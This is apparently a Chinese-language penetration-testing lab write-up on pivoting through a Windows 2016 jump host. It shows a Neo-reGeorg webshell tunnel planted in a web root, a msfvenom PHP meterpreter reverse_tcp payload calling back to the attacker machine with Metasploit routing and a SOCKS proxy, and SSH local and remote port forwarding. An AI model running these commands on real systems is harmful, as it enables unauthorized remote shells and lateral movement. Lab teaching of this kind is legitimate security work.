一、基于Neo-reGeorg
Neo-reGeorg是常见的http正向隧道工具,是reGeorg工具的升级版。增加了很多特性,例如像内容加密、避免被检测、请求头定制、响应码定制、支持py3等等,https://github.com/L-codes/Neo-reGeorg
打开windows2016跳板机上的Web服务
开启之后在kali上确认是可以进行访问的
进入到Neo-reGeorg
1、生成木马
python3 neoreg.py generate -k 123456生成的木马文件如下
[+] Create neoreg server files:
=> neoreg_servers/tunnel.php
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.cs
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel.go
=> neoreg_servers/tunnel.ashx
=> neoreg_servers/tunnel.jsp
进入到neoreg-servers,发现生成了一个php文件
2、植入Windows2016
根据目标主机所提供的服务器类型来决定使用哪种木马。并将页面文件放入目标主机的Web服务器目录下
将生成的tunnel.php复制到windows2016上的xampp的htdocs目录下
然后我们在本机上进行访问,没有出现404,说明是可以进行正常访问的
3、实现连接
开始在Kali上运行这个脚本进行连接
python3 neoreg.py -k 123456 -u http://192.168.3.41/tunnel.php
通过这张图(SOCKS5 server)可以看出还是建立了一个代理通道
那我们首先在浏览器里面访问一下,发现无法进行访问
然后去在浏览器上设置代理 127.0.0.1:1080
然后再去浏览器上访问,发现访问成功
我们在终端上试一下,都其实是一样的操作,也可以访问访问成功的
MSF除了生成二进制木马以外,也可以给我们生成PHP的脚本型的木马
msfvenom -p php/meterpreter/reverse_tcp host=192.168.3.38 port=4444 -f raw > /home/kali/msfshell.php通过这段代码来生成PHP型的脚本木马
然后把这个脚本文件传输到windows2016上
然后进入到Kali的MSF里面去
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.3.38
run
然后就进入了meterpreter中
使用命令sysinfo确定是Windows2016
接下来我们试一试run autoroute
然后我们看看子网网段,告诉我们PHP脚本型的不支持这个
run get_local_subnets
发现这个也没用
说明PHP做的有限,比二进制弱一些
那我们手工来做一遍
先将这个木马文件放到后台去执行,使用background
然后手工加一下路由
route add 192.168.3.0/24 1
route add 192.168.209.0/24 1
route print
sessions
然后我们再使用代理
use auxiliary/server/socks_proxy,然后进行配置,run就可以了,run完用jobs看看,成功代理
然后我们去命令行看看是否成功,成功,说明我们刚才设置的PHP木马帮我们设的代理生效了
同时我们也可以使用wireshark来监听一下通信的流量,是TCP连接,因为我们的payload给的就是reverse_tcp,基于PHP建立了TCP的连接,然后帮助我们基于TCP协议来做SOCKS的代理,然后我们在Kali监听流量的时候就没有监听到任何http的流量
也可以在windows2016上启动wireshark来监听流量,这样会更加的直观明显,因为windows2016作为跳板机,两边可以独立进行监听,因为有两个网卡
二、基于SSH的隧道通信
SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据。但是,SSH还能够将其他TCP端口的网络数据通过SSH链接来转发,并且自动提供了相应的加密及解密服务。这一过程也被叫做"隧道"(tunneling),这是因为SSH为其他TCP链接提供了一个安全的通道来进行传输而得名。例如,Telnet,SMTP,LDAP这些TCP应用均能从中得益,避免了用户名,密码以及隐私信息的明文传输。而与此同时,如果工作环境中的防火墙限制了一些网络端口的使用,但是允许SSH的连接,也能够通过将TCP端口转发来使用SSH进行通讯
1、SSH本地转发
本实验使用Kali(攻击机)+ windows2016(跳板机) + windows7(目标主机进行操作,此时,只需要在Kali上输入以下命令即可通过本地访问到windows7上的80端口)
由于我的2016虚拟机没有安装OpenSSH server,所以我使用老师的电脑来进行实验
先将windows2016的OpenSSH server启动起来
启动起来之后我们使用win10的客户端进行远程连接
先将我们之前在浏览器上设置的代理给取消了
我们先去访问一下我们kali的8879端口,发现没有任何的连接
接下来我们在Kali的命令行里面去执行下面的命令
ssh -CfNg -L 8879:192.168.209.129:80 [email protected] (3.41为windows2016跳板机)
执行以上命令,并输入3.41跳板机的root密码。即可本地访问 localhost:8879,实现对192.168.209.129的访问这个时候我们看到命令行已经回来了,也没有给我们报错
发现可以访问localhost:8879
那这之间发生了什么呢,其实做的事情很简单。就是让远程的SSH的服务帮助我们做一个端口转发
2、SSH远程转发
在跳板机windows2016上运行以下指令:
ssh -CfNg -R 3333:192.168.209.129:3306 [email protected] 并输入kali的SSH密码
但是先得在Kali上运行:/etc/init.d/ssh start 启动SSH服务
然后我们去kali上访问localhost:3333
我们发现有MySQL的信息出现了
也可以直接将目标主机(window7)上的mysql在kali中登录上去
